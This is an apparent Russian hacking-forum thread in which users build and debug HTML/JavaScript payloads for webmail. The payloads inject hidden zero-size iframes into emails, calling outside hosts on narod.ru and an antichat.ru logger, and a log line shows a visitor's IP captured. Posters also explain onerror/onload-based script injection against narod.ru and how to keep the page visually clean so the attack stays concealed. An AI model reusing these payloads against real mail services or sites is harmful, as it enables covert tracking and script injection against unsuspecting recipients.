я отправил на тестовый мыльник письмо в html виде с кодом </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><embed src="javascript:status=location;document.getElementById('xxx').innerHTML='<iframe src=http://asdfg178.narod.ru/jopa.html width=0 height=0></iframe>';this.wav" width=0 height=0> <p id='xxx'>[/QUOTE]<span id='postcolor'> тока нихрена не работает
Ну так выясни почему не работает... Отошли письмо сам себе, размерись со скриптом... Разводить руками и говорить не работает все могут.. (а скрипт в принципе работоспособный, сам проверял)
Еще один вопрос про эту же статью.... в таблице на против Яндекса в колонке JS указано Onerror и Onload... что это хоть такое то? Да, а правее написано, что это дает удаление сайта *.narod.ru, а почтовый ящик взломать нельзя?
onerror и onload это события, возникающие при ошибке или при загрузке чего-либо. В статье подразмеваются конструкции типа <img src="http://noname.net/pupkin.jpg" onerror=alert()> Когда страница пытается загрузить несуществующую картинку, возникает ошибка, и выполняется скрипт, указанный в обработчике onerror. Под www.yandex.ru подразуемевается сайт бесплатного хостинга narod.yandex.ru, а не почтовый сервис.
2 mexcrack если сделаешь все как я скажу будешь все намного лучше понимать: скачать HomeSite 5.5 изучить HTML изучить CSS изучить JS понять DOM купить MSDN установить Apache изучить PHP/Perl изучить MySQL
2 zFailure Думаю что первые четыре пункта ему хватят, для того чтобы понять что такое обработчики событий onError onLoad...
кстати у меня еще хобби есть: я постоянно с инета скачиваю документацию по программированию (щас уже 2ой cd копится) всем советю делать тоже самое
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (zFailure @ июля 29 2004,07:47)</td></tr><tr><td id="QUOTE">кстати у меня еще хобби есть: я постоянно с инета скачиваю документацию по программированию (щас уже 2ой cd копится) всем советю делать тоже самое[/QUOTE]<span id='postcolor'> Жаль только прочитать удается 1% из скаченного)
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июля 21 2004,15:19)</td></tr><tr><td id="QUOTE">я отправил на тестовый мыльник письмо в html виде с кодом </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><embed src="javascript:status=location;document.getElementById('xxx').innerHTML='<iframe src=http://asdfg178.narod.ru/jopa.html width=0 height=0></iframe>';this.wav" width=0 height=0> <p id='xxx'>[/QUOTE]<span id='postcolor'> тока нихрена не работает [/QUOTE]<span id='postcolor'> Ну во-первых у тебя <iframe> не заменен спец.символами. Поэтому он будет смотерться как <xiframe>. Во-вторых getElementById объект DOM поддерживается ТОЧНО, только IE, насчет NN не знаю. А вот знаю что не поддерживается Оперой(хотя, бывают новые версии)). Для оперы можно сделать document.write, но тогда вся конспирация летит к чертям)
как насчет такого document.write(document.body.innerHTML+'<'+'script'+'>alert();<'+'/script'+'>'); здесь и document.write и сохраняем конспирацию
zFailure Все равно ты используешь код, который не поддерживается Оперой. По поаводу document.write имелось ввиду следующее: document.write('<iframe></iframe>' тогда будет срабатывать на люой платформе, но при открытии письма - визуально чистая страница
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=WINDOWS-1251"> <title>Untitled</title> </head> <body onLoad="document.write(document.body.innerHTML+'<iframe src=http://antichat.ru/cgi-bin/s.jpg?test width=0 height=0 style=display:none;></iframe>')"> 1234567890 </body> </html>[/QUOTE]<span id='postcolor'> этот код был вызван мною в Opera 7.53 в итоге [Mon Aug 2 12:53:46 2004] IP=XXX.XXX.XXX.XXX REFERER= QUERY=test
zFailure... и то верно. весьма и весьма.. хехе) Кстати, навскидку, так, не знаешь, <iframe> сейчас поддерживается nentscape'ом? не наду дистрибов что-то пока.. В скором времени отпишу сюда ещще кое-что, давольно интересная тема недавно была)
